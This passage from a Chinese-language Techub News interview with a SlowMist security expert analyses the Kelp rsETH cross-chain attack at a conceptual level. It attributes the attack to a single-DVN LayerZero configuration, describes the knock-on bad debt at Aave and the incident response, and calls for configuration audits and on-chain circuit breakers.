Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问 1：最致命的点是 LayerZero 框架问题，还是 Kelp 的配置问题？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">根据 LayerZero 的官⽅声明，其协议本身运⾏完全符合设计预期。问题在于 Kelp 选择了 1/1 DVN 配置 ——</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">LayerZero 已明确在集成⽂档中将此列为 &#34;Don&#39;t&#34; 项，并在事件前主动向 Kelp 沟通过最佳实践建议。从责任归属来看，这是集成⽅的配置决策带来的⻛险，⽽⾮协议层漏洞。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问 2：如果改成多 DVN 多重阈值，这次攻击能否被阻⽌？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">只要引⼊第⼆个独⽴的 DVN 作为验证⽅，攻击者就需要同时控制或欺骗两套互相独⽴的验证节点 —— 这在技术和资源层⾯的成本会指数级上升。这也是为什么 LayerZero 事后宣布：其 DVN 将拒绝为任何仍使⽤ 1/1 配置的应⽤签名。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">五、时间线复盘：T+46 分钟</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 5：从第⼀次得⼿到 Kelp 启动暂停机制，⼤约 46 分钟，这个应急速度算快还是慢？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">相对于很多安全事件动辄数⼩时才反应的情况，46 分钟在⾏业⾥不算太慢。但对于链上攻击来说，这个时间窗⼝依然⾜够完成⼤额资产的转移、抵押和借出。DeFi 的问题在于，所有操作都在区块间隔内完成，⼈⼯介⼊的速度天然跑不赢⾃动化攻击脚本。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问：未来真正有⽤的是不是链上⾃动熔断机制？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">是的。事后的⼈⼯响应只能做减损，真正能在前⼏分钟拦住的，只有链上的⾃动化防御机制 —— ⽐如异常铸造量警报、⼤额跨链交易限速、Oracle 偏差触发的⾃动暂停。这次事件应该成为⾏业推动 &#34; 链上⻛控⾃动化 &#34; 的重要节点。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">六、时间线复盘：未遂的第⼆波攻击</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 6：后续⿊客还有⼏笔继续尝试的动作，但没有成功，这说明了什么？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这说明攻击者的⽬标不是 2.9 亿美元，⽽是尽可能清空整个 rsETH 的跨链可⽤量。后续交易被 revert，意味着 Kelp 的暂停机制在最后关头⽣效，拦住了原本可能更⼤的损失。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问：如果项⽬⽅再慢 10-20 分钟，损失规模还会显著扩⼤吗</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">⼤概率会。攻击者在 DVN 被修复前仍有操作窗⼝，暂停机制的⽣效时间点直接决定了损失上限。这次 2.9 亿已经是巨⼤伤害，但从攻击者⾏为模式来看，如果没有被打断，数字还会更⾼。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">七、时间线复盘：Aave 被连带拖下⽔</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 7：⿊客偷完之后，为什么还 &#34;顺⼿坑了 Aave&#34;？这个 &#34;坑&#34; 是怎么发⽣的？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">借贷协议⽆法在链上区分 &#34;正常路径铸造的 rsETH&#34; 和 &#34;通过伪造跨链消息铸出的 rsETH&#34;—— 对 Aave 来说，它看到的只是⼀个符合标准的 ERC-20 代币和链上的价格数据。攻击者将异常获得的 rsETH 存⼊ Aave 作为抵押品，借出 ETH 等⾼流动性资产后离场，留下的是⽆法覆盖借款的坏账。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问 1：这暴露的是 Aave 的⻛控问题，还是 DeFi 对 &#34;外部资产真实性&#34; 的过度信任？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">两者都有，但更根本的是后者。借贷协议的⻛控参数通常基于资产的历史波动性和市值深度来设定抵押率，并不能感知 &#34;这个资产的发⾏来源是否被污染&#34;。这是⼀个跨越协议边界的信任传导问题，需要⾏业层⾯的解决⽅案，⽽不只是单个协议调参。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问 2：未来借贷协议是否需要重新定义 &#34;⾼质量抵押品&#34;？是的。⾄少在跨链合成资产这个类别上，&#34;能在链上被定价&#34; 和 &#34;真正是⾼质量抵押品&#34; 之间存在根本性的差距。</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">未来可能需要引⼊跨链来源验证、发⾏异常监控等机制，作为借贷协议接受 LRT 类资产时的前置条件。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">八、结构性判断：DeFi 乐⾼的系统性⻛险</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 8：这次是不是第⼀次把 &#34;LRT + 跨链桥 + 借贷协议&#34; 这</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">套乐⾼结构的⻛险完整暴露出来？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">是的，这是迄今为⽌对 DeFi 组合性⻛险最直观的⼀次示范。以往我们讨论的是 &#34;某个协议的 bug&#34;；这次暴露的是：当多个协议通过资产依赖关系形成组合时，任何⼀个环节的失陷都可以沿着价值流动路径向上下游传导，形成级联崩塌。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问：能否说 &#34;DeFi 表⾯去中⼼化，底层依赖少数⾼度中⼼化的验证点&#34;？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这个判断相当准确。这次事件的核⼼问题恰恰是：Kelp 将整个跨链路径的安全性押注在 LayerZero Labs ⾃⼰运营的单⼀ DVN 上，⽽ LayerZero Labs 的 DVN ⼜依赖少量 RPC 节点 —— 这是⼀条极短的信任链。&#34; 去中⼼化协议 &#34; 在某些关键环节上，实际存在⾮常集中的信任假设，⽽这些假设往往在⽂档的⻆落⾥，⽽不是在⽤户界⾯上。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">九、技术深挖：DVN 到底是什么</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 9：请⽤最通俗的⽅式解释 DVN，以及为什么 1/1 配置会成为致命漏洞？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">可以把 DVN 理解成跨链消息的 &#34;公证员&#34;。当⽤户要把资产从 A 链转到 B 链时，LayerZero 不会直接信任 A 链的状态，⽽是要求 DVN（去中⼼化验证⽹络）来独⽴核实 &#34;这笔交易确实在 A 链上发⽣了&#34;，然后再在 B 链上放⾏。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1/1 配置的意思是：只聘⽤了⼀个公证员，并且他的话就是最终判决。⼀旦这个公证员被欺骗、被收买、或者被提供了虚假的信息，整个验证就形同虚设 —— 没有第⼆个独⽴的声⾳来说 &#34; 等⼀下，我这边看到的不⼀样 &#34;。这就是单点失效的本质。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">⼗、技术深挖：为什么审计还不够</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 10：很多项⽬都说做过审计，为什么审计了还能出这么⼤的事？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">传统安全审计的核⼼是：检查代码逻辑是否按照预期运⾏、是否存在已知漏洞模式。但这次的问题发⽣在代码之外 —— 它发⽣在 &#34;部署后的运⾏时参数配置&#34; 层⾯：谁来验证、需要⼏个验证者、如果验证者失效怎么办。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">⾏业需要从 &#34;代码审计&#34; ⾛向 &#34;系统审计&#34;，后者应当包含：跨链依赖配置审计、治理权限审计、关键基础设施依赖评估，以及最重要的 ——&#34;如果某个外部组件失效，最坏会发⽣什么&#34; 的压⼒测试。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">追问 1：未来是否应该将 &#34;配置审计&#34; 单独列为强制项？</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">我认为是的。尤其对于跨链协议和使⽤ LayerZero、Wormhole 等跨链基础设施的项⽬，DVN 配置、executor 配置等参数应当被纳⼊正式审计范围，并在报告中明确披露当前配置的安全假设和最坏情景。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">⼗一、慢雾视⻆：追踪、⽌损与⾏业协作</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 11：从慢雾⻆度，重⼤攻击发⽣后第⼀时间会做哪些事？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">通常会同步启动以下⼏个⽅向：</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">链上溯源与⿊客画像：追踪资⾦流向，识别攻击者的链上身份特征、历史⾏为、资⾦来源（是否经过混币器以及哪种混币器），建⽴攻击者画像。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">交易所协同：向主要中⼼化交易所发出资产警报，要求对涉事⿊客地址进⾏监控和拉⿊冻结，防⽌攻击者通过 KYC 渠道出⾦。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">⻛险告警：向 DeFi 协议、钱包等⽣态参与者推送⻛险地址列表，协助切断攻击者的后续操作路径。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">⽩帽谈判窗⼝：在部分案例中，与攻击者建⽴沟通渠道，提供合理的 &#34;赏⾦留存&#34; 条件，推动资⾦部分归还。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 追问：已经经过混币预处理的资⾦，真正追回的概率⾼吗？</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">坦率讲，如果是 Lazarus Group 级别的攻击者操作，链上资⾦完全追回的可能性极低。他们有成熟的资⾦拆分和混币流程。现阶段⾏业最现实的努⼒⽅向，是建⽴更快的跨交易所资产冻结协作机制，以及推动更多司法管辖区对链上证据的执法接⼝ —— 这是⽬前最薄弱的⼀环，技术能⼒已经不是主要瓶颈。</span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">⼗二、普通⽤户视⻆：DeFi 还敢不敢玩</span></span></strong></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">Techub News 采访问题 